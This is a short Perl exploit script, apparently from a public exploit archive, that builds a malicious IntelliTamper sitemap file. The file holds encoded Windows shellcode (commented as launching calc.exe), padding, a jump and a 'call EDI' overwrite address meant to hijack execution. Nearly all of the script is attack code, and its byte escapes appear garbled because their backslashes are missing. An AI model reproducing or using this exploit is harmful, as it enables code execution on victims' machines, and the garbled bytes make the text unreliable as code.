# k`sOSe - 7/21/2008
# http://secunia.com/advisories/20172
# A sploit for an ancient vuln. Just because i need
# to improve my skills on windows explotation.
use warnings;
use strict;
# CMD="c:windowssystem32calc.exe"
# [*] x86/alpha_mixed succeeded, final size 345
# bad char -> x89
my $shellcode =
"x54x5axdaxd0xd9x72xf4x59x49x49x49x49x49x49x49" .
"x49x49x49x49x43x43x43x43x43x43x37x51x5ax6ax41" .
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42" .
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b" .
"x4cx4ax48x47x34x43x30x45x50x45x50x4cx4bx51x55" .
"x47x4cx4cx4bx43x4cx43x35x44x38x45x51x4ax4fx4c" .
"x4bx50x4fx42x38x4cx4bx51x4fx51x30x43x31x4ax4b" .
"x51x59x4cx4bx46x54x4cx4bx45x51x4ax4ex46x51x49" .
"x50x4ax39x4ex4cx4cx44x49x50x44x34x43x37x49x51" .
"x49x5ax44x4dx43x31x48x42x4ax4bx4cx34x47x4bx50" .
"x54x51x34x44x44x42x55x4ax45x4cx4bx51x4fx46x44" .
"x43x31x4ax4bx42x46x4cx4bx44x4cx50x4bx4cx4bx51" .
"x4fx45x4cx43x31x4ax4bx4cx4bx45x4cx4cx4bx43x31" .
"x4ax4bx4dx59x51x4cx46x44x45x54x48x43x51x4fx46" .
"x51x4cx36x43x50x51x46x43x54x4cx4bx50x46x50x30" .
"x4cx4bx47x30x44x4cx4cx4bx44x30x45x4cx4ex4dx4c" .
"x4bx42x48x44x48x4cx49x4bx48x4dx53x49x50x42x4a" .
"x46x30x45x38x4ax50x4dx5ax45x54x51x4fx45x38x4a" .
"x38x4bx4ex4cx4ax44x4ex50x57x4bx4fx4dx37x45x33" .
"x47x4ax51x4cx42x57x43x59x42x4ex43x54x42x4fx44" .
"x37x42x53x51x4cx44x33x44x39x44x33x44x34x43x55" .
"x42x4dx46x53x47x42x51x4cx43x53x43x51x42x4cx45" .
"x33x46x4ex42x45x43x48x43x55x45x50x45x5ax41x41";
print "### SITEMAP1 INTELLITAMPERn" .
"x41x41" .
"xebx20" . # jump ahead
"FOLDER##" .
"x41" x 24 .
$shellcode .
"E" x 108 .
"x59x51x3dx7e" . # ASCII friendly 'call EDI'
"AAAAn";